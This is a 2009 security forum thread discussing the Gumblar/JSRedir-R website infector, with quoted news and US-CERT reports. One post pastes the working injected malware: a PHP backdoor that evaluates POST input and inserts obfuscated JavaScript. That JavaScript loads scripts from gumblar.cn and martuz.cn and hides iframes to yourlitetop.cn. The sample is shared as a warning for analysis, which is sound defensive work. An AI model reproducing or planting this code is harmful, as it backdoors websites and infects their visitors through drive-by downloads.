JSRedir-R
Results 1 to 9 of 9

Thread: JSRedir-R

  1. #1
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,190

    JSRedir-R

    Nothing terribly special about this website infector other than its phenomenal penetration in a very short space of time:

    http://www.telegraph.co.uk/sciencean...y-experts.html



    More here:

    http://tech.yahoo.com/news/pcworld/2...rgetingmalware
    Last edited by nihil; May 16th, 2009 at 06:04 PM.

  2. #2
    Banned
    Join Date
    Jan 2008
    Posts
    605
    So is it an automated attack on web applications? It sounds like a worm is spreading through sql injection and remote file inclusion flaws and this script is the payload. But it doesn't give any detail about what web applications are being hit.

    http://www.zone-h.org/mirror/id/8870521

  3. #3
    StOrM™
    Join Date
    Aug 2004
    Posts
    1,003
    sigh.. there are still so many servers out there which are infect by automated piece of code.. amazing..
    Parth Maniar,
    CISSP, CISM, CISA, SSCP

    *Thank you GOD*

    Greater the Difficulty, SWEETER the Victory.

    Believe in yourself.

  4. #4
    AO's Filibustier Cheap Scotch Ron's Avatar
    Join Date
    Nov 2008
    Location
    Swamps of Jersey
    Posts
    378
    But it doesn't give any detail about what web applications are being hit.
    See Nihil's second url/link...

    The attack code has largely gone after PDF and Flash flaws discovered in the last year (such as APSA08-01 and APSB08-11), according to the company's spokesperson. Such attacks typically go after browser plugins installed by software and don't require opening or downloading anything, but these particular assaults can be largely neutered by making sure you have the latest versions of the Adobe software.

    One of the explanatory blog posts from ScanSafe also describes using old MDAC exploits as well, so be sure you're up to date on Microsoft updates also. The PDF attack approach is more bad news for Adobe, whose programs have become a favorite target of late.

    Successful attacks will attempt to install malware that manipulates Google search result pages when viewed by Internet Explorer. Victims may see fake results that will redirect them to fradulent sites. To spread itself further, the malware will also attempt to steal FTP logins and hijack any Web sites controlled by an infected PC.
    In God We Trust....Everything else we backup.

  5. #5
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,190
    Yes,

    US-CERT say this:

    Gumblar Malware Exploit Circulating

    added May 18, 2009 at 12:47 pm
    US-CERT is aware of public reports of a malware exploit circulating. This is a drive-by-download exploit with multiple stages and is being referred to as Gumblar. The first stage of this exploit attempts to compromise legitimate websites by injecting malicious code into them. Reports indicate that these website infections occur primarily through stolen FTP credentials but may also be compromised through poor configuration settings, vulnerable web applications, etc. The second stage of this exploit occurs when users visit a website compromised by Gumblar. Users who visit these compromised websites and have not applied updates for known PDF and Flash Player vulnerabilities may become infected with malware. This malware may be used by attackers to monitor network traffic and obtain sensitive information, including FTP and login credentials, that can be used to conduct further exploits. Additionally, this malware may also redirect Google search results for the infected user.

  6. #6
    Banned
    Join Date
    Jan 2008
    Posts
    605
    See Nihil's second url/link
    That had absolutely nothing to do with what I was talking about.
    The first stage of this exploit attempts to compromise legitimate websites by injecting malicious code into them. Reports indicate that these website infections occur primarily through stolen FTP credentials but may also be compromised through poor configuration settings, vulnerable web applications, etc.
    Agian, it could be someone spreading the exploit on XSSable pages that allow javascript to be posted up. Or it could be a full on worm that spreads via remote file inclusion. They give no detailed information at all about this except for the fact that someone sandwiched together exploits for browser extensions.

  7. #7
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,190
    This is neither an XSS exploit nor a worm, and although some pundits describe it as a trojan, it isn't one of those either.

    Basically there is a bot that scans the internet looking for vulnerable websites into which it can inject javascript. As no security researcher has yet obtained a copy of this bot, it is unclear what vulnerabilities are being targeted. The speed at which this malware has spread by comparison to its peers would suggest that it uses multiple vulnerabilities.

    The second part is pretty straightforward. You visit a compromised website and pick up a drive-by infection.

    Apparently the latest version of the bot uses heavily obfuscated javascript which makes each site's infection virtually unique.

  8. #8
    Senior Member t34b4g5's Avatar
    Join Date
    Sep 2003
    Location
    Australia.
    Posts
    2,391

    Smile

    Greetz.

    Here's a example of the script that is being used. Prease be careful.

    In other words
    *DO NOT EVEN BOTHER OPENING "hXXp://yourlitetop.cn" IN YOUR BROWSER*

    Code:
    <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbih0KXtldmFsKHVuZXNjYXBlKCgndmFyJjIwYSYzZCYyMlNjJjcyaXB0RW4mNjcmNjluZSYyMiYyYyY2MiYzZCYyMlZlJjcyc2kmNmZuKCYyOSsmMjImMmNqJjNkJjIyJjIyJjJjdSYzZCY2ZWEmNzYmNjlnYXRvciYyZSY3NXNlckFnZW4mNzQmM2JpJjY2KCYyOHUmMmVpbmQmNjV4T2YmMjgmMjImNTdpbiYyMikmM2UwJjI5JjI2JjI2KHUmMmUmNjluZGUmNzhPZigmMjJOVCYyMDYmMjIpJjNjJjMwKSYyNiYyNiYyOCY2NG8mNjN1JjZkZW50JjJlY29va2llJjJlJjY5biY2NCY2NXhPZigmMjJtaWVrJjNkMSYyMikmM2MmMzApJjI2JjI2KCY3NHlwZW8mNjYoeiY3MnYmN2F0JjczKSYyMSYzZHQmNzkmNzAmNjVvJjY2KCYyMiY0MSYyMiYyOSkpJjdienJ2JjdhJjc0cyYzZCYyMkEmMjImM2JldmFsKCYyMmlmKHdpbiY2NG93JjJlJjIyK2EmMmImMjIpJjZhJjNkaismMjIrYSYyYiYyMk1ham9yJjIyK2ImMmJhJjJiJjIyTWkmNmVvciYyMitiK2EmMmImMjJCdWlsZCYyMismNjImMmImMjImNmEmM2ImMjImMjkmM2JkJjZmY3VtZW4mNzQmMmUmNzcmNzJpdGUmMjgmMjImM2MmNzNjcmlwdCYyMHMmNzJjJjNkJjJmJjJmZ3VtYmxhciYyZWNuJjJmJjcyc3MmMmYmM2ZpZCYzZCYyMismNmErJjIyJjNlJjNjJjVjJjJmc2NyaSY3MHQmM2UmMjIpJjNiJjdkJykucmVwbGFjZSh0LCclJykpKX0pKC8mL2cpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title><iframe src="http://yourlitetop.cn/ts/in.cgi?mozila9" width=2 height=4 style="visibility: hidden"></iframe>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
    
    ***ORIGINAL PAGE'S CONTENT REMAINED HERE***
    
    echo "<iframe src=\"http://nyoflak15041F8\" width=1 height=1 style=\"visibility:hidden;position
    ]
    and this in a number of .htm files:


    Code:
    <script language=javascript><!-- 
    (function(OFJqv){var Sl3='&#37;';var RLE=('va,72,20a,3d,22Sc,72iptEngi,6ee,22,2cb,3d,22Versio,6e()+,22,2cj,3d,22,22,2cu,3d,6eavig,61t,6f,72,2e,75ser,41g,65nt,3bif((u,2e,69nd,65xOf(,22Ch,72ome,22,29,3c0),26,26(,75,2e,69,6ed,65xOf,28,22W,69n,22,29,3e0,29,26,26(u,2eindexOf,28,22N,54,206,22,29,3c0),26,26(document,2eco,6fkie,2eind,65,78Of,28,22miek,3d1,22),3c0),26,26,28ty,70,65of(,7a,72vzts),21,3dtypeof,28,22A,22,29)),7b,7arvzts,3d,22,41,22,3bev,61,6c,28,22i,66(window,2e,22,2ba+,22),6a,3dj+,22+a+,22Maj,6fr,22,2bb+a+,22Min,6fr,22+b+,61+,22B,75ild,22+,62+,22j,3b,22),3b,64o,63ume,6e,74,2ewrite(,22,3cscr,69,70t,20,73,72c,3d,2f,2fm,22+,22artu,7a,2e,63n,2fv,69d,2f,3fid,3d,22+j,2b,22,3e,3c,5c,2fscri,70t,3e,22,29,3b,7d').replace(OFJqv,Sl3);var lTtZO=unescape(RLE);eval(lTtZO)})(/\,/g);
     --></script><body><iframe src="http://yourlitetop.cn/ts/in.cgi?mozila9" width=2 height=4 style="visibility: hidden"></iframe>
    Last edited by t34b4g5; May 21st, 2009 at 02:11 PM.

  9. #9
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,190
    Hi t34b4g5,

    Are you sure? that looks more like an Iframe injection than javascript redirection?

    There is an analysis at Unmaskparasites:

    http://blog.unmaskparasites.com/2009...jected-script/

    And:

    http://blog.unmaskparasites.com/2009...mblar-exploit/

    JSRedir-F redirected to Grumblar.cn and more recently to Martuz.cn

    yourlitetop.cn seems to be associated with Win32.Heur, rather than a JS redirect & browser hijack?
    Last edited by nihil; May 22nd, 2009 at 09:13 PM.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •